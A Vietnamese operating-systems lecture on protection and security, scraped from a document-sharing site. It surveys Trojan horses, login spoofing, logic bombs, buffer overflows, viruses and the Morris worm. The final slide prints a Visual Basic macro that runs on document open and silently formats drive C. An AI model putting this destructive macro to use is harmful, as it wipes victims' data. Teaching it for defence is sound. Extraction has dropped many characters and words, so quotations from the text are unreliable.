1. Trang chủ
  2. » Thể loại khác

Bài giảng Thành phần bảo vệ và bảo mật

10 7 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

• Thay thế các chương trình tiện ích của hệ thống để tấn công nạn nhân. • Chương trình miễn phí tấn công người dùng nhẹ dạ, thiếu hiểu biết[r]

(1)(2)

• Thảo luận hình thức cơng hệ thống máy tính

• Trình bày số chế bảo vệ, bảo mật cơ hệ điều hành

(3)

• Có hình thức cơng hệ thống máy tính ?

(4)

• Các mối đe dọa

– Phơi bày liệu  Đe dọa tính riêng tư – Thay đổi liệu  Đe dọa tính tồn vẹn – Từ chối dịch vụ  Đe dọa tính sẵn sàng

• Xâm phạm

– Vơ tình – Chứng tỏ – Cắp vặt – Gián điệp

• Tai nạn

– Thiên tai

(5)

• Tấn công từ hệ thống

– Trojan Horses – Login Spoofing – Logic Bombs – Trap Doors

– Buffer Overflow

• Tấn cơng từ ngồi hệ thống

– Virus

(6)

 Là công thực đăng nhập vào

hệ thống

 Trojan Horses

• Thay chương trình tiện ích hệ thống để cơng nạn nhân

• Chương trình miễn phí cơng người dùng nhẹ dạ, thiếu hiểu biết

 Login Spoofing

• Giả mạo hình đăng nhập để ăn cắp mật

 Logic Bombs

• Chương trình nhân viên cài vào hệ thống

(7)(8)(9)

• Bị cơng từ máy tính khác mạng • Internet Worm

– Tấn cơng dựa vào lỗ hổng bảo mật hệ điều hành

• Robert Tappan Morris, 1988

– Gồm chương trình

• Chương trình worm

• Chương trình bootstrap để tải worm

– Tự động lây lan qua đường mạng

• Mobile Code

(10)

• Được chèn vào chương trình hợp lệ công cụ gọi “dropper”

– Đoạn virus viết Visual Basic thực format ổ cứng

Sub AutoOpen() Dim oFS

Set oFS = CreateObject(“Scripting.FileSystemObject”) vs = Shell(“c:command.com /k format c:”,vbHide)

CuuDuongThanCong.com https://fb.com/tailieudientucntt

Ngày đăng: 11/03/2021, 09:44

Xem thêm:

w